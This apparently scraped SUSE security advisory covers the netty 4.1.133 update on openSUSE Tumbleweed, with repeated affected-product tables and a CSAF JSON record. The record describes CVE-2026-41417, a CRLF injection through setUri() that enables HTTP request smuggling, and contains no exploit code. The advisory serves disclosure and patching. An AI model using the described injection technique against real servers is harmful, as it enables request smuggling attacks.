| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
5.6 (Medium)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
6.5 (Medium)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
8.2 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
5.3 (Medium)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
References
38 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "netty-4.1.133-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the netty-4.1.133-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-10795",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_10795-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-41417 page",
"url": "https://www.suse.com/security/cve/CVE-2026-41417/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42578 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42578/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42579 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42579/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42580 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42580/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42581 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42581/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42582 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42582/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42583 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42583/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42584 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42584/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42585 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42585/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42586 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42586/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42587 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42587/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-44248 page",
"url": "https://www.suse.com/security/cve/CVE-2026-44248/"
}
],
"title": "netty-4.1.133-1.1 on GA media",
"tracking": {
"current_release_date": "2026-05-16T00:00:00Z",
"generator": {
"date": "2026-05-16T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:10795-1",
"initial_release_date": "2026-05-16T00:00:00Z",
"revision_history": [
{
"date": "2026-05-16T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "netty-4.1.133-1.1.aarch64",
"product": {
"name": "netty-4.1.133-1.1.aarch64",
"product_id": "netty-4.1.133-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "netty-bom-4.1.133-1.1.aarch64",
"product": {
"name": "netty-bom-4.1.133-1.1.aarch64",
"product_id": "netty-bom-4.1.133-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "netty-javadoc-4.1.133-1.1.aarch64",
"product": {
"name": "netty-javadoc-4.1.133-1.1.aarch64",
"product_id": "netty-javadoc-4.1.133-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "netty-parent-4.1.133-1.1.aarch64",
"product": {
"name": "netty-parent-4.1.133-1.1.aarch64",
"product_id": "netty-parent-4.1.133-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "netty-4.1.133-1.1.ppc64le",
"product": {
"name": "netty-4.1.133-1.1.ppc64le",
"product_id": "netty-4.1.133-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "netty-bom-4.1.133-1.1.ppc64le",
"product": {
"name": "netty-bom-4.1.133-1.1.ppc64le",
"product_id": "netty-bom-4.1.133-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "netty-javadoc-4.1.133-1.1.ppc64le",
"product": {
"name": "netty-javadoc-4.1.133-1.1.ppc64le",
"product_id": "netty-javadoc-4.1.133-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "netty-parent-4.1.133-1.1.ppc64le",
"product": {
"name": "netty-parent-4.1.133-1.1.ppc64le",
"product_id": "netty-parent-4.1.133-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "netty-4.1.133-1.1.s390x",
"product": {
"name": "netty-4.1.133-1.1.s390x",
"product_id": "netty-4.1.133-1.1.s390x"
}
},
{
"category": "product_version",
"name": "netty-bom-4.1.133-1.1.s390x",
"product": {
"name": "netty-bom-4.1.133-1.1.s390x",
"product_id": "netty-bom-4.1.133-1.1.s390x"
}
},
{
"category": "product_version",
"name": "netty-javadoc-4.1.133-1.1.s390x",
"product": {
"name": "netty-javadoc-4.1.133-1.1.s390x",
"product_id": "netty-javadoc-4.1.133-1.1.s390x"
}
},
{
"category": "product_version",
"name": "netty-parent-4.1.133-1.1.s390x",
"product": {
"name": "netty-parent-4.1.133-1.1.s390x",
"product_id": "netty-parent-4.1.133-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "netty-4.1.133-1.1.x86_64",
"product": {
"name": "netty-4.1.133-1.1.x86_64",
"product_id": "netty-4.1.133-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "netty-bom-4.1.133-1.1.x86_64",
"product": {
"name": "netty-bom-4.1.133-1.1.x86_64",
"product_id": "netty-bom-4.1.133-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "netty-javadoc-4.1.133-1.1.x86_64",
"product": {
"name": "netty-javadoc-4.1.133-1.1.x86_64",
"product_id": "netty-javadoc-4.1.133-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "netty-parent-4.1.133-1.1.x86_64",
"product": {
"name": "netty-parent-4.1.133-1.1.x86_64",
"product_id": "netty-parent-4.1.133-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-4.1.133-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64"
},
"product_reference": "netty-4.1.133-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-4.1.133-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le"
},
"product_reference": "netty-4.1.133-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-4.1.133-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-4.1.133-1.1.s390x"
},
"product_reference": "netty-4.1.133-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-4.1.133-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64"
},
"product_reference": "netty-4.1.133-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-bom-4.1.133-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64"
},
"product_reference": "netty-bom-4.1.133-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-bom-4.1.133-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le"
},
"product_reference": "netty-bom-4.1.133-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-bom-4.1.133-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x"
},
"product_reference": "netty-bom-4.1.133-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-bom-4.1.133-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64"
},
"product_reference": "netty-bom-4.1.133-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-javadoc-4.1.133-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64"
},
"product_reference": "netty-javadoc-4.1.133-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-javadoc-4.1.133-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le"
},
"product_reference": "netty-javadoc-4.1.133-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-javadoc-4.1.133-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x"
},
"product_reference": "netty-javadoc-4.1.133-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-javadoc-4.1.133-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64"
},
"product_reference": "netty-javadoc-4.1.133-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-parent-4.1.133-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64"
},
"product_reference": "netty-parent-4.1.133-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-parent-4.1.133-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le"
},
"product_reference": "netty-parent-4.1.133-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-parent-4.1.133-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x"
},
"product_reference": "netty-parent-4.1.133-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-parent-4.1.133-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
},
"product_reference": "netty-parent-4.1.133-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-41417",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-41417"
}
],
"notes": [
{
"category": "general",
"text": "Netty allows request-line validation to be bypassed when a `DefaultHttpRequest` or `DefaultFullHttpRequest` is created first and its URI is later changed via `setUri()`. The constructors reject CRLF and whitespace characters that would break the start-line, but `setUri()` does not apply the same validation. `HttpRequestEncoder` and `RtspEncoder` then write the URI into the request line verbatim. If attacker-controlled input reaches `setUri()`, this enables CRLF injection and insertion of additional HTTP or RTSP requests, leading to HTTP request smuggling or desynchronization on the HTTP side and request injection on the RTSP side. This issue is fixed in versions 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-41417",
"url": "https://www.suse.com/security/cve/CVE-2026-41417"
},
{
"category": "external",
"summary": "SUSE Bug 1264350 for CVE-2026-41417",
"url": "https://bugzilla.suse.com/1264350"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
